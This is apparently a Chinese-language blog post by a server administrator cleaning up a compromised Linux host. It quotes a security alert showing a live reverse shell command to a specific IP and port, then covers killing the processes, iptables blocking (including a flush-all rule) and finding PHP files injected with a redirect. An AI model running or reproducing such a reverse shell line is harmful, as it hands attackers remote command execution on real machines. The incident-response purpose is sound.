進程異常行為-反彈Shell攻擊
父進程名稱:bash
進程名稱:bash
進程名稱:/usr/bin/bash
進程id:23,077
命令行參數:sh -c /bin/bash -i >& /dev/tcp/27.255.72.119/4451 0>&1
說明:黑客利用遠程代碼執行漏洞或者惡意木馬向中控服務器建立反向TCP連接,連接建立后,黑客可利用該連接遠程執行任意系統指令,嚴重危害主機安全。
解決方案:建議立即KILL該可疑反彈SHELL進程,並及時清理計划任務中的惡意代碼。
看下27.255.72.119是什么鬼?
這個IP全是邪惡文件。
首先,用ps查看進程,方法如下:
ps -ef
N多反彈SHELL進程需要清理。
下面利用循環kill掉進程。
ps命令將某個進程顯示出來 grep命令是查找 中間的|是管道命令 是指ps命令與grep同時執行 PS是LINUX下最常用的也是非常強大的進程查看命令 grep命令是查找,是一種強大的文本搜索工具,它能使用正則表達式搜索文本,並把匹配的行打印出來。awk '{print $2}' $fileName : 一行一行的讀取指定的文件, 以空格作為分隔符,打印第二個字段。while read line的 循環中的重定向,done寫在最后相當於給整個while do 語句加了一個約束條件,讀取每行至文件尾。
ps -ef | grep 27.255.72.119| awk '{print $2}'| while read line;do kill $line;done
kill 結束不掉的時候,可以加 -9,強制
kill -9 28271
查看iptables規則,包括所有的鏈。filter表包含INPUT、OUTPUT、FORWARD三個規則鏈。 說明:-L是--list的簡寫,作用是列出規則。
iptables -L
使用 iptables屏蔽IP段
iptables -A OUTPUT -d 27.255.72.119 -j DROP
#添加屏蔽IP #禁止此IP訪問服務器 iptables -I INPUT -s 1.2.3.4 -j DROP 或 iptables -A INPUT -s 1.2.3.4 -j DROP #禁止服務器訪問此IP iptables -A OUTPUT -d 1.2.3.4 -j DROP 如果要封某個網段: iptables -I INPUT -s 1.2.3.0/24 -j DROP #清空屏蔽IP iptables -t filter -D INPUT -s 1.2.3.4 -j DROP iptables -t filter -D OUTPUT -d 1.2.3.4 -j DROP #一鍵清空所有規則 iptables -F #查看 iptables -L INPUT 或 iptables -L 或 iptables-save(此命令將保存規則,下次開機自動執行)
Netstat 是一款命令行工具,可用於列出系統上所有的網絡套接字連接情況,包括 tcp, udp 以及 unix 套接字,另外它還能列出處於監聽狀態(即等待接入請求)的套接字。
netstat -tnpla| grep ESTABLISHED| grep root
cat /etc/rc.local
百度打開主網站被跳轉鏈接了6he5566.com還彈出個QQ框,what?
find . -name "*.php" -exec grep -i "6he5566.com" {} \;
刪除這些文件,修改相應配置conf文件,修改文件目錄權限,修復代碼漏洞。